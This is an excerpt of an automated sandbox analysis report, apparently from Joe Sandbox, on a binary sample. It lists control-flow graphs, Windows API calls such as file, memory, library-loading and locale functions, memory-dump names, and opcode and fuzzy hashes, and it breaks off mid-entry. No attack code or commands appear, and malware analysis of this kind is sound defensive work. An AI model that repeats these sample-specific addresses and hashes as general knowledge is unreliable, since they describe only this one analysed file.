                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                      • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                      • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                      • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                      • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                      • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                      • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 384 407912-407917 363->384 385 4078ed-407910 363->385 381 407820-407823 364->381 382 407890-407893 364->382 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->349 379->381 380->358 386 4077cf-4077d4 380->386 387 407824 381->387 388 407898 381->388 382->388 385->384 385->385 386->355 392 4077d6-4077de 386->392 389 40789a 387->389 391 407825 387->391 388->389 395 40789f 389->395 393 407896-407897 391->393 394 407826-40782d 391->394 392->345 404 4077e0 392->404 393->388 397 4078a1 394->397 398 40782f 394->398 395->397 402 4078a3 397->402 403 4078ac 397->403 400 407832-407833 398->400 401 4078a5-4078aa 398->401 400->355 400->379 405 4078ae-4078af 401->405 402->401 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->388 407 4078bf-4078c0 406->407
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                      • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                      • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                      • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 419 401ff1-401ff6 414->419 415->416 417 402038-40203c 416->417 418 4020cb-4020d1 416->418 420 402041-402050 417->420 421 40203e 417->421 423 4020d3-4020e0 418->423 424 40211d-40211f call 401ee0 418->424 422 40214f-402158 419->422 420->418 425 402052-402060 420->425 421->420 427 4020e2-4020ea 423->427 428 4020ef-40211b call 402f54 423->428 432 402124-40213b 424->432 430 402062-402066 425->430 431 40207c-402080 425->431 427->428 428->422 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 440 402147 432->440 441 40213d-402142 RtlLeaveCriticalSection 432->441 434->435 439 4020a2-4020c6 call 402f54 435->439 437->438 438->439 439->422 441->440
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                        • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                        • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                        • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                        • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 296031713-0
                                                                                                      • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                      • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                      • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                      • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                      • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                      • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1948546556-0
                                                                                                      • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                      • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                      • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                      • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                        • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                        • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                      • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                      • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                      • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                      • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                      • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                      • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                      • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                      • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                      • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                      • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                      • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                      APIs
                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 1306739567-0
                                                                                                      • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                      • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                      • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                      • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,020A8000,0040AA59,00000000), ref: 004076B3
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                      • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                      • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                      • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
